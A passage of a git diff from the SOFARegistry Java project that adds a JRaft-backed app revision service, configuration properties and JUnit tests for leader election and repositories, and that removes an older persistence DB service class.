(appRevisionService.existed(appRevision.getRevision())) { + return; + } + appRevisionService.add(appRevision); + LOGGER.info("register new revision: {}", appRevision.getRevision()); + } + + public List checkRevisions(String keysDigest) { + if (keysDigest.equals(appRevisionService.getKeysDigest())) { + return null; + } + return appRevisionService.getKeys(); + } + + public List fetchRevisions(List keys) { + return appRevisionService.getMulti(keys); + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/revision/AppRevisionService.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/revision/AppRevisionService.java new file mode 100644 index 000000000..eed736863 --- /dev/null +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/revision/AppRevisionService.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft.revision; + +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; +import java.util.List; + +public interface AppRevisionService { + + @ReadOnLeader + AppRevision get(String revision); + + @ReadOnLeader + boolean existed(String revision); + + void add(AppRevision appRevision); + + @ReadOnLeader + String getKeysDigest(); + + @ReadOnLeader + List getKeys(); + + @ReadOnLeader + List getMulti(List keys); +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/service/PersistenceDataDBService.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/service/PersistenceDataDBService.java deleted file mode 100644 index 0cf1f9ed1..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/service/PersistenceDataDBService.java +++ /dev/null @@ -1,147 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.service; - -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.store.api.DBResponse; -import com.alipay.sofa.registry.store.api.DBService; -import com.alipay.sofa.registry.store.api.annotation.RaftService; - -import java.io.IOException; -import java.util.HashSet; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author shangyu.wh - * @version $Id: PersistenceDataDBService.java, v 0.1 2018-06-22 17:23 shangyu.wh Exp $ - */ -@RaftService -public class PersistenceDataDBService extends AbstractSnapshotProcess implements DBService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(PersistenceDataDBService.class); - - private ConcurrentHashMap serviceMap = new ConcurrentHashMap<>(); - - private Set snapShotFileNames = new HashSet<>(); - - /** - * constructor - */ - public PersistenceDataDBService() { - } - - /** - * constructor - * @param serviceMap - */ - public PersistenceDataDBService(ConcurrentHashMap serviceMap) { - this.serviceMap = serviceMap; - } - - @Override - public SnapshotProcess copy() { - return new PersistenceDataDBService(new ConcurrentHashMap<>(serviceMap)); - } - - @Override - public void openDB(String dbName, Class entityClass) { - } - - @Override - public boolean put(String key, Object value) { - if (key == null || value == null) { - LOGGER.error("key {} or value {} can't be null", key, value); - return false; - //throw new IllegalArgumentException("key or value can't be null!"); - } - Object ret = serviceMap.put(key, value); - if (ret != null) { - LOGGER.warn("value {} with key {} will be override", ret, key); - } - return true; - } - - @Override - public DBResponse get(String key) { - if (key == null) { - LOGGER.error("key can't be null"); - throw new IllegalArgumentException("query key can't be null"); - } - Object ret = serviceMap.get(key); - return ret != null ? DBResponse.ok(ret).build() : DBResponse.notfound().build(); - } - - @Override - public boolean update(String key, Object value) { - if (key == null || value == null) { - LOGGER.error("key {} or value {} can't be null", key, value); - return false; - } - Object ret = serviceMap.put(key, value); - if (ret != null) { - LOGGER.warn("value {} with key {} will be override", ret, key); - } - return true; - } - - @Override - public boolean remove(String key) { - if (key == null) { - LOGGER.error("key can't be null"); - return false; - } - Object obj = serviceMap.remove(key); - if (obj == null) { - LOGGER.warn("remove key {} can't be found!", key); - return false; - } - return true; - } - - @Override - public boolean save(String path) { - return save(path, serviceMap); - } - - @Override - public boolean load(String path) { - try { - ConcurrentHashMap map = load(path, serviceMap.getClass()); - serviceMap.clear(); - serviceMap.putAll(map); - return true; - } catch (IOException e) { - LOGGER.error("Load serviceMap data error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(this.getClass().getSimpleName()); - return snapShotFileNames; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/resources/application.properties b/server/store/jraft/src/main/resources/application.properties new file mode 100644 index 000000000..cb2937140 --- /dev/null +++ b/server/store/jraft/src/main/resources/application.properties @@ -0,0 +1,2 @@ +meta.server.elector.lockExpireDuration=20000 +meta.server.revisionGcSilenceHour=24 \ No newline at end of file diff --git a/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/AbstractRaftTestBase.java b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/AbstractRaftTestBase.java new file mode 100644 index 000000000..b1c0b74f9 --- /dev/null +++ b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/AbstractRaftTestBase.java @@ -0,0 +1,69 @@ +package com.alipay.sofa.registry.jraft; + +import com.alipay.sofa.registry.jraft.config.DefaultConfigs; +import org.junit.After; +import org.junit.runner.RunWith; +import org.springframework.beans.BeansException; +import org.springframework.boot.autoconfigure.SpringBootApplication; +import org.springframework.boot.test.context.SpringBootTest; +import org.springframework.context.ApplicationContext; +import org.springframework.context.ApplicationContextAware; +import org.springframework.test.context.ActiveProfiles; +import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; + +import java.io.File; + +/** + *

registry-parent

+ *

+ * + * @author : xingpeng + * @date : 2021-06-21 21:27 + **/ +@ActiveProfiles("test") +@SpringBootTest(classes = AbstractRaftTestBase.RaftTestConfig.class) +@RunWith(SpringJUnit4ClassRunner.class) +public class AbstractRaftTestBase extends AbstractTest implements ApplicationContextAware{ + protected ApplicationContext applicationContext; + + @Override + public void setApplicationContext(ApplicationContext applicationContext) throws BeansException { + this.applicationContext=applicationContext; + } + +// @After +// public void deletRheaKVData(){ +// File databaseFile = new File(DefaultConfigs.DB_PATH); +// File raftFile = new File(DefaultConfigs.RAFT_DATA_PATH); +// if(databaseFile.exists()){ +// deleteFile(databaseFile); +// } +// +// if(raftFile.exists()){ +// deleteFile(raftFile); +// } +// } +// +// private void deleteFile(File file){ +// File[] files=file.listFiles();/*获取该目录下得所有文件或者文件夹*/ +// if(files.length==0) {/*如果为空则直接退出*/ +// return; +// } +// System.out.println(file.getAbsolutePath());/*显示当前文件路劲*/ +// for(File f:files) {/*for 循环得一种便利方法*/ +// if(f.isFile()) {/*判断f是否是文件*/ +// f.delete(); +// } +// else if(f.isDirectory()) {/*判断f是否是文件夹*/ +// deleteFile(f); +// } +// if(f.length()==0){ +// f.delete(); +// } +// } +// file.delete(); +// } + + @SpringBootApplication() + public static class RaftTestConfig {} +} diff --git a/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/AbstractTest.java b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/AbstractTest.java new file mode 100644 index 000000000..b49f95bc7 --- /dev/null +++ b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/AbstractTest.java @@ -0,0 +1,287 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jraft; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import io.netty.util.ResourceLeakDetector; +import org.junit.After; +import org.junit.Before; +import org.junit.BeforeClass; +import org.junit.Rule; +import org.junit.rules.TestName; + +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Collections; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.*; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class AbstractTest { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected ExecutorService executors; + + protected ScheduledExecutorService scheduled; + + @Rule public TestName name = new TestName(); + + public static final Random random = new Random(); + + @BeforeClass + public static void beforeAbstractTestClass() { + System.setProperty("spring.main.show_banner", "false"); + } + + @Before + public void beforeAbstractTest() throws Exception { + + ResourceLeakDetector.setLevel(ResourceLeakDetector.Level.PARANOID); + Thread.interrupted(); // clear interrupt + + executors = Executors.newCachedThreadPool(new NamedThreadFactory(name.getMethodName())); + scheduled = + Executors.newScheduledThreadPool( + Runtime.getRuntime().availableProcessors(), + new NamedThreadFactory("sched-" + name.getMethodName())); + if (logger.isInfoEnabled()) { + logger.info(remarkableMessage("[begin test][{}]"), name.getMethodName()); + } + } + + @After + public void afterAbstractTest() + throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException { + executors.shutdownNow(); + scheduled.shutdownNow(); + + logger.info(remarkableMessage("[end test][{}]"), name.getMethodName()); + } + + protected static void setEnv(Map newenv) throws Exception { + try { + Class processEnvironmentClass = Class.forName("java.lang.ProcessEnvironment"); + Field theEnvironmentField = processEnvironmentClass.getDeclaredField("theEnvironment"); + theEnvironmentField.setAccessible(true); + Map env = (Map) theEnvironmentField.get(null); + env.putAll(newenv); + Field theCaseInsensitiveEnvironmentField = + processEnvironmentClass.getDeclaredField("theCaseInsensitiveEnvironment"); + theCaseInsensitiveEnvironmentField.setAccessible(true); + Map cienv = + (Map) theCaseInsensitiveEnvironmentField.get(null); + cienv.putAll(newenv); + } catch (NoSuchFieldException e) { + Class[] classes = Collections.class.getDeclaredClasses(); + Map env = System.getenv(); + for (Class cl : classes) { + if ("java.util.Collections$UnmodifiableMap".equals(cl.getName())) { + Field field = cl.getDeclaredField("m"); + field.setAccessible(true); + Object obj = field.get(env); + Map map = (Map) obj; + map.clear(); + map.putAll(newenv); + } + } + } + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected String remarkableMessage(String msg) { + return String.format("--------------------------%s--------------------------\r\n", msg); + } + + protected void waitForAnyKeyToExit() throws IOException { + logger.info("type any key to exit.................."); + waitForAnyKey(); + } + + protected void waitForAnyKey() throws IOException { + System.in.read(); + } + + protected void waitConditionUntilTimeOut(BooleanSupplier booleanSupplier) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, 5000, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static class NotifyObserversCounter implements UnblockingObserver { + + private final AtomicInteger counter = new AtomicInteger(0); + + @Override + public void update(Observable source, Object message) { + counter.getAndIncrement(); + } + + public int getCounter() { + return counter.get(); + } + } + + public static class ConcurrentExecutor implements Executor { + + private final int tasks; + + private final CyclicBarrier barrier; + + private final CountDownLatch latch; + + private final ExecutorService executors; + + public ConcurrentExecutor(int tasks, ExecutorService executors) { + this.tasks = tasks; + this.barrier = new CyclicBarrier(tasks); + this.latch = new CountDownLatch(tasks); + this.executors = executors; + } + + @Override + public void execute(final Runnable command) { + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + command.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + } +} diff --git a/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/elector/MetaRaftLeaderElectorTest.java b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/elector/MetaRaftLeaderElectorTest.java new file mode 100644 index 000000000..10947fd10 --- /dev/null +++ b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/elector/MetaRaftLeaderElectorTest.java @@ -0,0 +1,84 @@ +package com.alipay.sofa.registry.jraft.elector; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.jraft.AbstractRaftTestBase; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.domain.LeaderLockDomain; +import com.alipay.sofa.registry.store.api.elector.AbstractLeaderElector; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +import java.util.Date; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.TimeoutException; + +/** + * @author : xingpeng + * @date : 2021-06-10 15:30 + **/ +public class MetaRaftLeaderElectorTest extends AbstractRaftTestBase { + + private MetaRaftLeaderElector leaderElector; + + private DefaultCommonConfig defaultCommonConfig; + + private RheaKVStore rheaKVStore; + + private Map leaderInfoMap = new ConcurrentHashMap<>(); + + @Before + public void beforeMetaJdbcLeaderElectorTest() { + leaderElector=applicationContext.getBean(MetaRaftLeaderElector.class); + defaultCommonConfig=applicationContext.getBean(DefaultCommonConfig.class); + rheaKVStore=applicationContext.getBean(RheaKVStore.class); + } + + @Test + public void testDoElect() throws TimeoutException, InterruptedException { + Assert.assertNotNull(leaderElector); + leaderElector.change2Follow(); + waitConditionUntilTimeOut(() -> leaderElector.amILeader(), 5000); + } + + @Test + public void testDoQuery() throws TimeoutException, InterruptedException { + leaderElector.change2Follow(); + waitConditionUntilTimeOut(() -> leaderElector.amILeader(), 5000); + AbstractLeaderElector.LeaderInfo leaderInfo = leaderElector.doQuery(); + Assert.assertEquals(leaderInfo.getLeader(), leaderElector.myself()); + } + + @Test + public void testFollowWorking() throws TimeoutException, InterruptedException{ + leaderElector.change2Follow(); + waitConditionUntilTimeOut(() -> leaderElector.amILeader(), 5000); + + byte[] leaderInfoBytes = rheaKVStore.bGet("DISTRIBUTE-LOCk"); + + Map leaderLockDomainMap = CommandCodec.decodeCommand(leaderInfoBytes, leaderInfoMap.getClass()); + + LeaderLockDomain leaderLockDomain = leaderLockDomainMap.get(defaultCommonConfig.getClusterId()); + leaderElector.onFollowWorking(leaderLockDomain,leaderElector.myself()); + } + + @Test + public void testLeaderInfo(){ + Date date = new Date(); + LeaderLockDomain leaderLockDomain=new LeaderLockDomain(); + leaderLockDomain.setOwner("testOwner"); + leaderLockDomain.setGmtModified(date); + leaderLockDomain.setDuration(1000); + AbstractLeaderElector.LeaderInfo leaderInfo= MetaRaftLeaderElector.leaderFrom("testOwner",date.getTime(),date,1000); + + Assert.assertEquals(leaderInfo.getLeader(),leaderLockDomain.getOwner()); + Assert.assertEquals(leaderInfo.getEpoch(),leaderLockDomain.getGmtModified().getTime()); + Assert.assertEquals( + leaderInfo.getExpireTimestamp(),leaderLockDomain.getGmtModified().getTime() + 1000 / 2); + } +} + + + diff --git a/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/AppRevisionRaftRepositoryTest.java b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/AppRevisionRaftRepositoryTest.java new file mode 100644 index 000000000..707874121 --- /dev/null +++ b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/AppRevisionRaftRepositoryTest.java @@ -0,0 +1,213 @@ +package com.alipay.sofa.registry.jraft.repository; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.alipay.sofa.registry.jraft.AbstractRaftTestBase; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.repository.impl.AppRevisionHeartbeatRaftRepository; +import com.alipay.sofa.registry.jraft.repository.impl.AppRevisionRaftRepository; +import com.alipay.sofa.registry.jraft.repository.impl.InterfaceAppsRaftRepository; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.google.common.collect.Maps; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +import java.util.ArrayList; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; + +/** + * @author : xingpeng + * @date : 2021-07-28 20:09 + **/ +public class AppRevisionRaftRepositoryTest extends AbstractRaftTestBase { + private static final Logger LOG = LoggerFactory.getLogger(AppRevisionRaftRepositoryTest.class); + + private AppRevisionRaftRepository appRevisionRaftRepository; + + private InterfaceAppsRaftRepository interfaceAppsRaftRepository; + + private AppRevisionHeartbeatRaftRepository appRevisionHeartbeatRaftRepository; + + private DefaultCommonConfig defaultCommonConfig; + + private List appRevisionList; + + private static final Integer APP_REVISION_SIZE = 1; + + private RheaKVStore rheaKVStore; + + /**dataCenter,AppRevision*/ + private Map appRevisionMap=new ConcurrentHashMap<>(); + + private static final String APP_REVISION="AppRevision"; + + private static final String INTERFACE_APPS="InterfaceApps"; + + @Before + public void buildAppRevision() { + appRevisionHeartbeatRaftRepository = applicationContext.getBean(AppRevisionHeartbeatRaftRepository.class); + interfaceAppsRaftRepository = applicationContext.getBean(InterfaceAppsRaftRepository.class); + appRevisionRaftRepository = applicationContext.getBean(AppRevisionRaftRepository.class); + defaultCommonConfig = applicationContext.getBean(DefaultCommonConfig.class); + rheaKVStore = applicationContext.getBean(RheaKVStore.class); + + appRevisionList = new ArrayList<>(); + for (int i = 1; i <= APP_REVISION_SIZE; i++) { + long l = System.currentTimeMillis(); + String suffix = l + "-" + i; + + String appname = "foo" + suffix; + String revision = "1111" + suffix; + + AppRevision appRevision = new AppRevision(); + appRevision.setAppName(appname); + appRevision.setRevision(revision); + appRevision.setClientVersion("1.0"); + + Map> baseParams = Maps.newHashMap(); + baseParams.put( + "metaBaseParam1", + new ArrayList() { + { + add("metaBaseValue1"); + } + }); + appRevision.setBaseParams(baseParams); + + Map interfaceMap = Maps.newHashMap(); + String dataInfo1 = + DataInfo.toDataInfoId( + "func1" + suffix, ValueConstants.DEFAULT_GROUP, ValueConstants.DEFAULT_INSTANCE_ID); + String dataInfo2 = + DataInfo.toDataInfoId( + "func2" + suffix, ValueConstants.DEFAULT_GROUP, ValueConstants.DEFAULT_INSTANCE_ID); + + AppRevisionInterface inf1 = new AppRevisionInterface(); + AppRevisionInterface inf2 = new AppRevisionInterface(); + interfaceMap.put(dataInfo1, inf1); + interfaceMap.put(dataInfo2, inf2); + appRevision.setInterfaceMap(interfaceMap); + + inf1.setId("1"); + Map> serviceParams1 = new HashMap>(); + serviceParams1.put( + "metaParam2", + new ArrayList() { + { + add("metaValue2"); + } + }); + inf1.setServiceParams(serviceParams1); + + inf2.setId("2"); + Map> serviceParams2 = new HashMap>(); + serviceParams1.put( + "metaParam3", + new ArrayList() { + { + add("metaValue3"); + } + }); + inf1.setServiceParams(serviceParams2); + + appRevisionList.add(appRevision); + } + } + + @Test + public void registerAndQuery() throws Exception { + // register + for (AppRevision appRevisionRegister : appRevisionList) { + appRevisionRaftRepository.register(appRevisionRegister); + } + + // query app_revision + for (AppRevision appRevisionRegister : appRevisionList) { + AppRevision revision = + appRevisionRaftRepository.queryRevision(appRevisionRegister.getRevision()); + Assert.assertEquals(appRevisionRegister.getAppName(), revision.getAppName()); + } + + // query by interface + /** */ + for (AppRevision appRevisionRegister : appRevisionList) { + for (Map.Entry entry : + appRevisionRegister.getInterfaceMap().entrySet()) { + String dataInfoId = entry.getKey(); + InterfaceMapping appNames = interfaceAppsRaftRepository.getAppNames(dataInfoId); + Assert.assertTrue(appNames.getNanosVersion() < 0); + Assert.assertTrue(appNames.getApps().size() == 0); + } + } + } + + @Test + public void refresh() throws Exception{ + registerAndQuery(); + appRevisionRaftRepository.refresh(); + } + + @Test + public void heartbeatClean() throws Exception { + + registerAndQuery(); + + for (AppRevision appRevision : appRevisionList) { + + boolean before = appRevisionRaftRepository.heartbeat(appRevision.getRevision()); + Assert.assertTrue(before); + byte[] appRevisionMapBytesBefore = rheaKVStore.bGet(APP_REVISION); + try{ + appRevisionMap = CommandCodec.decodeCommand(appRevisionMapBytesBefore,appRevisionMap.getClass()); + }catch (NullPointerException e){ + LOG.info("invoke heartbeatClean before RheaKV is empty"); + } + AppRevision valueBefore = appRevisionMap.get(defaultCommonConfig.getClusterId()); + if(valueBefore!=null){ + appRevisionMap.remove(defaultCommonConfig.getClusterId()); + rheaKVStore.bPut(APP_REVISION,CommandCodec.encodeCommand(appRevisionMap)); + } + boolean after = appRevisionRaftRepository.heartbeat(appRevision.getRevision()); + Assert.assertTrue(after); + byte[] appRevisionMapBytesAfter = rheaKVStore.bGet(APP_REVISION); + try{ + appRevisionMap = CommandCodec.decodeCommand(appRevisionMapBytesAfter,appRevisionMap.getClass()); + }catch (NullPointerException e){ + LOG.info("invoke heartbeatClean after RheaKV is empty"); + } + AppRevision valueAfter = appRevisionMap.get(defaultCommonConfig.getClusterId()); + Assert.assertTrue(valueAfter == null); + } + appRevisionHeartbeatRaftRepository.doHeartbeatCacheChecker(); + + for (AppRevision appRevision : appRevisionList) { + boolean success = appRevisionRaftRepository.heartbeat(appRevision.getRevision()); + Assert.assertFalse(success); + } + } + + @Test + public void revisionGc() throws Exception { + registerAndQuery(); + appRevisionHeartbeatRaftRepository.doAppRevisionGc(0); + byte[] appRevisionMapBytes = rheaKVStore.bGet(APP_REVISION); + try{ + appRevisionMap = CommandCodec.decodeCommand(appRevisionMapBytes,appRevisionMap.getClass()); + }catch (NullPointerException e){ + + } + AppRevision appRevision = appRevisionMap.get(defaultCommonConfig.getClusterId()); + Assert.assertTrue(appRevision == null); + } + +} \ No newline at end of file diff --git a/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/InterfaceAppsRaftRepositoryTest.java b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/InterfaceAppsRaftRepositoryTest.java new file mode 100644 index 000000000..71d834384 --- /dev/null +++ b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/InterfaceAppsRaftRepositoryTest.java @@ -0,0 +1,74 @@ +package com.alipay.sofa.registry.jraft.repository; + +import com.alipay.sofa.jraft.rhea.client.RheaKVStore; +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.jraft.AbstractRaftTestBase; +import com.alipay.sofa.registry.jraft.command.CommandCodec; +import com.alipay.sofa.registry.jraft.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jraft.config.DefaultConfigs; +import com.alipay.sofa.registry.jraft.domain.InterfaceAppsDomain; +import com.alipay.sofa.registry.jraft.repository.impl.InterfaceAppsRaftRepository; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +import java.sql.Timestamp; +import java.util.ArrayList; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; + +/** + * @author : xingpeng + * @date : 2021-07-30 08:36 + **/ +public class InterfaceAppsRaftRepositoryTest extends AbstractRaftTestBase { + private RheaKVStore rheaKVStore; + + private InterfaceAppsRaftRepository interfaceAppsRaftRepository; + + private static final String INTERFACE_APPS="InterfaceApps"; + + /** map: */ + protected Map interfaceAppsMap = new ConcurrentHashMap<>(); + + private DefaultCommonConfig defaultCommonConfig; + + @Before + public void before(){ + interfaceAppsRaftRepository = applicationContext.getBean(InterfaceAppsRaftRepository.class); + rheaKVStore = applicationContext.getBean(RheaKVStore.class); + defaultCommonConfig = applicationContext.getBean(DefaultCommonConfig.class); + } + + @Test + public void testGetAppNames(){ + byte[] interfaceAppsBytes = rheaKVStore.bGet(INTERFACE_APPS); + String app = "saveApp"; + List services = new ArrayList<>(); + try{ + interfaceAppsMap = CommandCodec.decodeCommand(interfaceAppsBytes, interfaceAppsMap.getClass()); + }catch (NullPointerException e) { + //LOG.info("INTERFACE_APPS RheaKV is empty"); + } + for (int i = 0; i < 100; i++) { + services.add(i + "batchSaveService-" + System.currentTimeMillis()); + } + for (String interfaceName : new HashSet<>(services)){ + InterfaceAppsDomain interfaceAppsDomain = new InterfaceAppsDomain(defaultCommonConfig.getClusterId(), + interfaceName, + app, + new Timestamp(System.currentTimeMillis()) + ); + interfaceAppsMap.put(interfaceName,interfaceAppsDomain); + } + rheaKVStore.bPut(INTERFACE_APPS,CommandCodec.encodeCommand(interfaceAppsMap)); + + for (String service : services) { + InterfaceMapping appNames = interfaceAppsRaftRepository.getAppNames(service); + Assert.assertEquals(0, appNames.getApps().size()); + } + } + +} diff --git a/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/ProvideDataRaftRepositoryTest.java b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/ProvideDataRaftRepositoryTest.java new file mode 100644 index 000000000..21fff17fe --- /dev/null +++ b/server/store/jraft/src/test/java/com/alipay/sofa/registry/jraft/repository/ProvideDataRaftRepositoryTest.java @@ -0,0 +1,75 @@ +package com.alipay.sofa.registry.jraft.repository; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.jraft.AbstractRaftTestBase; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import org.junit.Assert; +import org.junit.Test; +import org.springframework.beans.factory.annotation.Autowired; + +import java.util.Collection; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; + +/** + * @author : xingpeng + * @date : 2021-07-30 08:37 + **/ +public class ProvideDataRaftRepositoryTest extends AbstractRaftTestBase { + + @Autowired + private ProvideDataRepository provideDataRaftRepository; + + @Test + public void testPut() { + long version = System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId("key" + version, "DEFAULT", "DEFAULT"); + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData(dataInfoId, "val"); + boolean success = provideDataRaftRepository.put(persistenceData, persistenceData.getVersion()); + Assert.assertTrue(success); + Assert.assertEquals("val", provideDataRaftRepository.get(dataInfoId).getData()); + Assert.assertEquals( + persistenceData.getVersion(), provideDataRaftRepository.get(dataInfoId).getVersion()); + } + + @Test + public void testRemove() { + long version = System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId("key" + version, "DEFAULT", "DEFAULT"); + PersistenceData persistenceData = 